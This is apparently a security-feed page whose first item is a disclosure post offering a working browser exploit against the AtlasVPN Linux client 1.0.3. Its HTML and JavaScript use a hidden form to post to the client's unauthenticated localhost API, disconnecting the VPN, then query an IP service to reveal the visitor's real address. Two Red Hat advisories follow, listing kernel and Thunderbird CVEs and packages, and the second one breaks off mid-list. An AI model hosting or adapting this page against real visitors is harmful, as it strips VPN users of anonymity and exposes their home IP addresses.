Remote disconnect exploit for AtlasVPN Linux client version 1.0.3 that will allow a remote website to extract a client's real IP address.

    The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.Root CauseThe AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.Exploit CodeThe following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.    <html>     <head>      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>    </head>     <body>      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=     You should be running the atlasvpn linux client and be connected to a VPN.    Use <b>atlasvpn connect</b> to connect to a VPN server.     </code></pre>       <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">        <button type="submit" style="display: none"></button>      </form>       <script>        window._currentIP = false;         // Run main exploit code        window.addEventListener('load', function () {          addIPToLog();          setTimeout(triggerFormSubmission, 1000);          setTimeout(addIPToLog, 3000);        });         // Blind CORS request to atlasvpnd to disconnect the VPN        function triggerFormSubmission() {          var logDiv = document.getElementById('log');          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";          document.getElementById('stopForm').submit();        }         // Gets IP from ipfy API (this, of course, could be your server)        function addIPToLog() {          var logDiv = document.getElementById('log');          var xhr = new XMLHttpRequest();           xhr.open('GET', 'https://api.ipify.org?format=json', true);           xhr.onload = function () {            var ipAddress = window._currentIP;            if (xhr.status === 200) {              var response = JSON.parse(xhr.responseText);              ipAddress = response.ip;               logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";            } else {              logDiv.innerHTML += '[-] Error fetching IP address.\n';            }             // Check if the IP changed. If yes: Success.            if (window._currentIP && window._currentIP != ipAddress) {              logDiv.innerHTML += "[+] Successfully disconnected VPN."            }            if (window._currentIP && window._currentIP == ipAddress) {              logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."            }             // Save IP for next iteration.            window._currentIP = ipAddress;          };           xhr.send();        }      </script>    </body>    </html>    GreetsFly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.

AtlasVPN Linux Client 1.0.3 IP Leak

Red Hat Security Advisory 2023-4962-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4962-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4962  
Issue date:        2023-09-05  
CVE Names:         CVE-2023-1829 CVE-2023-2002 CVE-2023-2124   
                   CVE-2023-3090 CVE-2023-3390 CVE-2023-4004   
                   CVE-2023-35001 CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v.8.4) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: Use-after-free vulnerability in the Linux Kernel traffic control  
index filter (CVE-2023-1829)

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
(CVE-2023-3090)

* kernel: UAF in nftables when nft_set_lookup_global triggered after  
handling named and anonymous sets in batch requests (CVE-2023-3390)

* kernel: netfilter: use-after-free due to improper element removal in  
nft_pipapo_remove() (CVE-2023-4004)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()  
(CVE-2023-35001)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

* Kernel: bluetooth: Unauthorized management command execution  
(CVE-2023-2002)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* aacraid misses interrupts when a CPU is disabled resulting in scsi  
timeouts and the adapter being unusable until reboot. (BZ#2216500)

* rbd: avoid fast-diff corruption in snapshot-based mirroring [8.9]  
(BZ#2216771)

* refcount_t overflow often happens in mem_cgroup_id_get_online()  
(BZ#2221012)

* enable conntrack clash resolution for GRE (BZ#2223544)

* iavf: Fix race between iavf_close and iavf_reset_task (BZ#2223608)

* libceph: harden msgr2.1 frame segment length checks [8.x] (BZ#2227075)

* [i40e] error: Cannot set interface MAC/vlanid to 1e:b7:e2:02:b1:aa/0 for  
ifname ens4f0 vf 0: Resource temporarily unavailable (BZ#2228165)

Enhancement(s):

* [Intel 8.7 FEAT] TSC: Avoid clock watchdog when not needed (BZ#2216050)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187308 - CVE-2023-2002 Kernel: bluetooth: Unauthorized management command execution  
2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2188470 - CVE-2023-1829 kernel: Use-after-free vulnerability in the Linux Kernel traffic control index filter  
2213260 - CVE-2023-3390 kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests  
2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
2218672 - CVE-2023-3090 kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
2220892 - CVE-2023-35001 kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()  
2225275 - CVE-2023-4004 kernel: netfilter: use-after-free due to improper element removal in nft_pipapo_remove()

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
kernel-4.18.0-305.103.1.el8_4.src.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.103.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.103.1.el8_4.noarch.rpm

x86_64:  
bpftool-4.18.0-305.103.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
kernel-4.18.0-305.103.1.el8_4.src.rpm

aarch64:  
bpftool-4.18.0-305.103.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.aarch64.rpm  
perf-4.18.0-305.103.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.103.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.103.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.103.1.el8_4.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.103.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.ppc64le.rpm  
perf-4.18.0-305.103.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.103.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.103.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
perf-4.18.0-305.103.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.103.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.103.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
kernel-4.18.0-305.103.1.el8_4.src.rpm

aarch64:  
bpftool-4.18.0-305.103.1.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.aarch64.rpm  
perf-4.18.0-305.103.1.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.103.1.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.103.1.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.103.1.el8_4.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.103.1.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.ppc64le.rpm  
perf-4.18.0-305.103.1.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.103.1.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.103.1.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.103.1.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.103.1.el8_4.s390x.rpm  
perf-4.18.0-305.103.1.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm  
python3-perf-4.18.0-305.103.1.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.103.1.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.103.1.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.103.1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1829  
https://access.redhat.com/security/cve/CVE-2023-2002  
https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-3390  
https://access.redhat.com/security/cve/CVE-2023-4004  
https://access.redhat.com/security/cve/CVE-2023-35001  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9yhLAAoJENzjgjWX9erEw2oP/1lGMi4JU//SAI7MT1KTTzIJ  
wi0rpkeO65vnvrCtTS2XQaAMito7+3Ou4z7V556LJi7fCi7sdwr6azxi4uyDDyQ5  
ARBC7TjWfKhKtJtzgpa+2R8DTrohH9/06ufoJtda2zwfTS+yZ1VQDl0l5umYcGpG  
CMralT9hjDc9K1lgG9szX+9OrI1RLnmAlum7BKMd/O7dDgn33igUotW+gwjaAy7S  
w+UBBQQsHYeTokXl6fq9CuhHf1EHQ3f++PXq1Y1AkP5fXRmzdlpgKTMt0VgQl9zJ  
CpoGgvduSyoaG8L7SokuoGn97ZApdr8Lh5LtEWuFoZke/FdWce3i8wMXfkxehd9w  
T4gB9+UYyokeSyBrE8H3CPlP64ivLDnDL8u1fQQlgAoCMDEoxemgQhoLPeKwl5Wk  
POdl4pTkEmgusKEjEF0cvS0b1yRpnpsWmK5We5DWZxlWIVyO74IDxo1q8GXayIbF  
xJgcGoQK/Xe1HPbFjAQU8TGnOet1Ehl3S6b18+HlEWQjsv5SLsHUR4WmTZCCo1fo  
78URhnt+owdYc9H1zo/drmg0R6uy0g5LDq5ZphlEVlx5tKw2mNptwdhvdP1ZAthV  
/eJA/qyPNb4uJnUeDDENug7PwOkEp/bDsOH2x4bTv1gfm78izwYT+/QyI7VTncE0  
LToP9GRowOFyCAn5ddY8  
=Dqw7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4962-01

Red Hat Security Advisory 2023-4955-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4955-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4955  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
